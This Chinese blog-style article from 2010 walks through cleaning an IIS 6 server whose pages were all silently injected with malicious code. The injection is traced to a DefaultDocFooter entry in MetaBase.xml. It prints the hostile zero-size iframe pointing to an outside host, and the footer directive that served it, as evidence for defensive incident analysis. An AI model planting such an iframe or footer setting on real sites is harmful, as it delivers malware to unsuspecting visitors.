网站运营
位置:首页>> 网站运营>> 处理Windows 2003服务器IIS被挂马全过程

处理Windows 2003服务器IIS被挂马全过程

  发布时间:2010-05-03 13:33:00 

标签:IIS挂马,winodws,2003,服务器

一台服务器 几乎所有网站打开网页 甚至HTML网页 都出现了

<iframe src="http://xxxdfsfd/web.htm" height=0 width=0></iframe>

这种样式的代码 有的在头部 有的在尾部 部分杀毒软件打开会报毒

打开HTML或ASP PHP页面 在源码中怎么也找不到这段代码

分析原因

首先怀疑ARP挂马,用防ARP的工具又没有发现有arp欺骗,而且arp欺骗一般不会每次都 * 入代码,而是时有时无.而且使用http://127.0.0.1 或者http://localhost 访问的时候也可以找到这段代码,arp欺骗的可能排除。

然后就想到可能是JS被篡改,或者是其它的包含文件,查找后没有发现被改的页面 连新建的HTML页面浏览的时候也会 * 入这段代码,那就只能是通过IIS挂上去的了。
备份iis数据然后重装iis,代码消失,将备份的iis恢复,问题又来了。

仔细寻找,问题应该出在IIS的配置文件上,打开配置文件,没有发现那段代码。

那很有可能是调用了某个文件,这个怎么查啊,忽然想起了大名鼎鼎的Filemon

本地载了一个上传到服务器上,打开Filemon,数据太多了,过滤掉一些没有用的只留下iis的进程,数据还是很多,看来服务器上的站点还是挺多人在访问的。

关掉所有站点,建了一个测试站点anky 目录为D:\www\ 在下面建了一个空白页面test.htm
访问一下这个页面代码 * 进来了,再看一下Filemon 奇怪怎么读取C:\Inetpub\wwwroot\iisstart.htm,打开C:\Inetpub\wwwroot\iisstart.htm一看,里面就躺着:

<iframe src="http://xxxdfsfd/web.htm" height=0 width=0></iframe>

把代码删除了留空,访问test.htm 正常了,把C:\Inetpub\wwwroot\iisstart.htm删除了再访问test.htm 出现 “读取数据页脚文件出错”问题就出这里了,看来是调用了
这个文件。把C:\Inetpub\wwwroot\iisstart.htm清空就正常了,这样怎么行,解决问题当然要连根拔掉。

continue

有没有可能是扩展造成的,到扩展中检查了一遍全部都是正常的当然 通过ISAPI 挂马的也是存在的左想右想最后还是觉得配置文件有问题打开配置文件,配置文件在%windir%\system32\inetsrv\MetaBase.xml用记事本打开,查找iisstart.htm 找到一行,开始以为是默认站点,后来一想不对啊。

默认站点都删除了,再仔细一看这句代码为

DefaultDocFooter="file:C:\Inetpub\wwwroot\iisstart.htm"

删除掉这一行,问题彻底解决了。

0
投稿

猜你喜欢

  • 目前很多用户已经宽带接入了Internet。包月的的宽带提供的带宽,已经足以使你的计算机成为互联网上的一台服务器。下面我就以易于在个人计算机
  • 我们知道,美国Yahoo公司早在去年三月份就宣布全球免费邮箱@Yahoo.COM将升级到不限量空间,不过日本和中国市场除外。昨天读者Geor
  • 我们链接专题系列的第三篇是关于创建导出链接,也就是怎样&ldquo;链出去&rdquo;。对于大多数网站管理员来说,导出链接
  • 前言日常使用 VIM 的时候经常有跳转到特定目录下某个文件的需求:使用 vimwiki 记笔记时会默认把所有笔记保存在目录 ~/vimwik
  • mkdir命令语法linux mkdir 命令用来创建指定的名称的目录,要求创建目录的用户在当前目录中具有写权限,并且指定的目录名不能是当前
  • 最近几个月,搜索不收录新的网站,不更新已有的网站,或者减少收录,或者降权的声音在各个论坛里经常发生,站长们也都是有苦难言,以前曾经写过具体的
  • 到底谁是真正的“开心网”?这个问题现在只能交由法律来最终裁定。昨日上午,北京市二中院开庭审理北京开心人信息技术有限公司(kaixin001.
  • 老谢说下软文的写作要点,希望对自己写软文的站长们一些帮助。一、标题新鲜标题新鲜,必须能吸引人的兴趣,使浏览者看了你这个标题之后仍有欲望看你的
  • 长尾关键词是由美国一些学者提出来的,具体叫什么名字我不记得了。可以这样说:在未来,长尾策略必将是互联网发展出路。著名的卖书网络巨头&
  • 只要你动作够快,一元钱就可以将原价数千元的笔记本电脑、液晶电视抱回家。 9月25日至30日,淘宝&ldquo;一元秒杀&rd
  • 关于你的博客Google知道些什么?Google拥有些什么?搜索引擎对博客有一系列的信任评价衡量指标,Google比你认为的更了解你的博客。
  • 品牌博客成功的三进策略:一、人脉进门所有成功博客的身边都有一个很强大的由其他博客撰写者组成的支持团。网络在很大程度上可以从很多方面帮助你,这
  •  由于Godaddy改版,网上的过户教程并不适用了,于是决定把过程记录下来,希望对朋友们有所帮助。感觉很多人还不是很熟悉,现在就把
  •     80 vCenter Server需要端口80用于直接HTTP连接。端口80会将请求重定向到HTTPS
  • 在配置Linux的 Apache服务时,经常会遇到http403错误,我今天配置测试时也出现了,最后解决了,总结了一下。http 403错误
  • 1.不要找全站链接,一个页面给过来链接就可以,全站链接权重降低还可能会被认为作弊。2.不要只找高PR的链接。3.控制链接数量增加的速度。短时
  • 网上流传的很多关于windows server 2003系统的安全配置,但是仔细分析下发现很多都不全面,并且很多仍然配置的不够合理,并且有很
  • 1. 思路不清网站定位 为什么做网站 如何做站等等,初期站长需要梦想不错,但是也不能看到人家做站成功就觉得别人行自己就一定行,这种想法只能说
  • 最近 Yahoo! Exceptional Performance 在 《优化网站性能的 14 条规则》的基础上又增加了 20 条新的规则。
  • 3.3.2. 算法名字服务器使用的算法和本地操作系统和数据结构相关,下面的算法假设RR以几个树型结构组织,一个树就是区,有一个树是用于缓冲的
手机版 网站运营 asp之家 www.aspxhome.com